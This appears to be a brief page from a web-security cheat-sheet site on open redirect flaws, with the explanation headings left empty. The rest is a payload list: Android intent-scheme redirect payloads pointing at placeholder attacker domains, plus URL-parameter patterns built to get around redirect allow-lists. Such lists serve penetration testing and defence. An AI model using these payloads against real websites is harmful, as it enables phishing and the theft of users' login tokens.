Open Redirect

What is it?

Exploitation

Example Payloads

@sirdarckcat example open redirect

http://evilwebsite.com/xss.php?redir_xss=intent://anyhostname.com/anypath?etc#Intent;package=x;S.browser_fallback_url=https://envil.website;end;%20

Shorter payload:
intent://anyhostname.com#Intent;scheme=evil.website;end

Cheat sheet

Basic Attack [ref1]

?url=https://www.hahwul.com

Open Redirect bypass pattern

?url=https://allow_domain.hahwul.com
?url=https://allow_domain@hahwul.com
?url=https://www.hahwul.com#allow_domain
?url=https://www.hahwul.com?allow_domain
?url=https://www.hahwul.com\allow_domain
?url=https://www.hahwul.com&allow_domain
?url=http:///////////www.hahwul.com
?url=http:\\www.hahwul.com
?url=http:\/\/www.hahwul.com

Other Resources

swisskyrepo's PayloadsAllTheThings

Hijacking accounts by retrieving JWT tokens via unvalidated redirects

References

[ref1] :

PreviousInsecure Desensitization NextCommand Injection

Last updated 4 years ago

Was this helpful?